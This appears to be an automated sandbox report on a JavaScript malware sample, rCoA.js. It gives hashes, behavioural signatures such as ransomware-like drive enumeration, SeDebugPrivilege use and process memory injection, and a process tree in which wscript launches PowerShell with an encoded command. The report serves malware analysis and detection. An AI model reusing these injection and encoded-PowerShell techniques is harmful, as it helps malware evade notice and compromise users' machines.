Analysis
max time kernel: 31s
max time network: 34s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 16/03/2023, 07:13
Static task: static1
Behavioral task: behavioral1 (sample: rCoA.js, resource: win7-20230220-en)
Behavioral task: behavioral2 (sample: rCoA.js, resource: win10v2004-20230220-en)
General
Target: rCoA.js
Size: 84KB
MD5: 9f9c96d904107988f9228890f0ca30d5
SHA1: 16f7c265d11ea75cb62345555c51073526a6c762
SHA256: aaae46d614933d1f6d932e3ec9b76902ab2d5788a41e7e97858aa637b86f5233
SHA512: cec6f9e4eec258f2f988afeaa0a4ce7a9fdd7d1d3839fa23e318f17374e784fb3d9958807a9ae24781af90fa1ab414390c59061a18f88c6c9af22d6c24073734
SSDEEP: 1536:g43+92oVhnGoW/bLBiVuuCHGHHfYLS0dwPphjiG5yE:TOrnn2P8V6mf65ds3P
Malware Config
Extracted
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid 2024, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description: Token: SeDebugPrivilege; pid 2024, process powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description: PID 2036 wrote to memory of 2024; pid 2036, process wscript.exe, procid_target 28
  description: PID 2036 wrote to memory of 2024; pid 2036, process wscript.exe, procid_target 28
  description: PID 2036 wrote to memory of 2024; pid 2036, process wscript.exe, procid_target 28
Processes
- C:\Windows\system32\wscript.exe
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\rCoA.js
  PID: 2036
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
    PID: 2024
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken